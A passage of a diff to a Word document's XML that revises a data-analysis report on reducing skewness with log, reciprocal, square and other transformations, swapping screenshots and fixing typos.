-                        <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed columns.</w:t>
+                        <w:t xml:space="preserve">Log transformation </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>proved to be more effective than the square root</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve"> and cube root</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve"> in reducing skewness, but it was still not sufficient to fully adjust the highly skewed column.</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -12568,10 +12384,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F46AD52" wp14:editId="2BB8C8DA">
-            <wp:extent cx="2721479" cy="1873523"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
-            <wp:docPr id="1624891173" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B6107D" wp14:editId="45F87E59">
+            <wp:extent cx="3067154" cy="1209675"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1910078564" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -12579,11 +12395,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1624891173" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="1910078564" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -12591,7 +12407,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2737249" cy="1884379"/>
+                      <a:ext cx="3076762" cy="1213464"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -12603,39 +12419,110 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Reciprocal Transformation</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Applying Square Root and Reciprocal </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Tramsformation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3271A70C" wp14:editId="06B67CBF">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>left</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>530225</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="3719830" cy="1395095"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="170613296" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="170613296" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3727587" cy="1398122"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -12643,18 +12530,18 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E6CBD3D" wp14:editId="127858E5">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="446A87AD" wp14:editId="17C2A53D">
                 <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>3573780</wp:posOffset>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>3947160</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>113030</wp:posOffset>
+                  <wp:posOffset>592455</wp:posOffset>
                 </wp:positionV>
-                <wp:extent cx="2397760" cy="986790"/>
-                <wp:effectExtent l="0" t="0" r="21590" b="22860"/>
+                <wp:extent cx="2152650" cy="1114425"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                 <wp:wrapSquare wrapText="bothSides"/>
-                <wp:docPr id="720821953" name="Text Box 2"/>
+                <wp:docPr id="1828869735" name="Text Box 2"/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
                 </wp:cNvGraphicFramePr>
@@ -12667,7 +12554,7 @@
                       <wps:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="2397760" cy="986790"/>
+                          <a:ext cx="2152650" cy="1114425"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -12689,9 +12576,15 @@
                           <w:p>
                             <w:pPr>
                               <w:jc w:val="both"/>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
                             </w:pPr>
                             <w:r>
-                              <w:t>The best approach was applying both the Square Root and Reciprocal transformations consecutively.</w:t>
+                              <w:t xml:space="preserve">Even after handling the skew with reciprocal transformation, the data was reduced to zeros, which is not useful for </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>regression.</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -12713,20 +12606,26 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="2E6CBD3D" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:281.4pt;margin-top:8.9pt;width:188.8pt;height:77.7pt;z-index:251677696;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="446A87AD" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:310.8pt;margin-top:46.65pt;width:169.5pt;height:87.75pt;z-index:251675648;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
                       <w:pPr>
                         <w:jc w:val="both"/>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
                       </w:pPr>
                       <w:r>
-                        <w:t>The best approach was applying both the Square Root and Reciprocal transformations consecutively.</w:t>
+                        <w:t xml:space="preserve">Even after handling the skew with reciprocal transformation, the data was reduced to zeros, which is not useful for </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>regression.</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
                 </v:textbox>
-                <w10:wrap type="square"/>
+                <w10:wrap type="square" anchorx="margin"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
@@ -12734,13 +12633,74 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>R</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>eciprocal transformation is effective in reducing the impact of outliers, especially for data with right-skewness.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">The best approach was applying both </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Log transformation and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Reciprocal transformation consecutively</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, which handled the skewness</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">successful and it </w:t>
+      </w:r>
+      <w:r>
+        <w:t>is still suitable for regressio</w:t>
+      </w:r>
+      <w:r>
+        <w:t>n.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B2F3CD" wp14:editId="27AF8D47">
-            <wp:extent cx="3287016" cy="1488258"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DD3F51" wp14:editId="357BDBEA">
+            <wp:extent cx="6120130" cy="2458720"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="258703134" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:docPr id="1509321540" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -12748,11 +12708,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="258703134" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="1509321540" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -12760,7 +12720,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3308612" cy="1498036"/>
+                      <a:ext cx="6120130" cy="2458720"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -12782,12 +12742,22 @@
           <w:lang w:val="en-IE"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
         <w:t>Left Skewness:</w:t>
       </w:r>
     </w:p>
@@ -12798,11 +12768,9 @@
       <w:r>
         <w:t xml:space="preserve">Now we have </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>olny</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>only</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> the columns with negative skew</w:t>
       </w:r>
@@ -12821,382 +12789,79 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Square Transformation;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Cubes Transformation;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
         </w:rPr>
-        <w:t>Square Transformation</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> The square</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> transformation is effective in reducing left skewness. It's the counterpart of the square root transformation and can be used when the data is left-skewed.</w:t>
+        <w:t>Square Transformation:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The square transformation is effective in reducing left skewness. It's the counterpart of the square root transformation and can be used when the data is left-skewed.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-        </w:rPr>
-        <w:t>Exponential Transformation:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Exponential transformations can be applied to data with negative skewness to stretch the lower values and compress the higher values.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-        </w:rPr>
-        <w:t>Box-Cox Transformation:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> The Box-Cox transformation is a family of power transformations that can be used to stabilize variance and make data more normal</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="3146"/>
-        <w:gridCol w:w="3236"/>
-        <w:gridCol w:w="3246"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3209" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Square Transformation result:</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3209" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>Exponential Transformation result:</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3210" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Box-Cox Transformation result:</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3209" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:bar w:val="none" w:sz="0" w:color="auto"/>
-              </w:pBdr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F0BECF0" wp14:editId="37523399">
-                  <wp:extent cx="1885307" cy="860612"/>
-                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-                  <wp:docPr id="1188298257" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1188298257" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId32"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="1908728" cy="871303"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3209" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:bar w:val="none" w:sz="0" w:color="auto"/>
-              </w:pBdr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00B865C2" wp14:editId="6C6D5F2F">
-                  <wp:extent cx="1936561" cy="900953"/>
-                  <wp:effectExtent l="0" t="0" r="6985" b="0"/>
-                  <wp:docPr id="277274128" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="277274128" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId33"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="1951166" cy="907748"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3210" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-                <w:bar w:val="none" w:sz="0" w:color="auto"/>
-              </w:pBdr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="641E9B5E" wp14:editId="255652EF">
-                  <wp:extent cx="1949645" cy="900430"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="1064909860" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1064909860" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId34"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="1962650" cy="906436"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">pplying the Square Transformation, we </w:t>
-      </w:r>
-      <w:r>
-        <w:t>can observe</w:t>
-      </w:r>
-      <w:r>
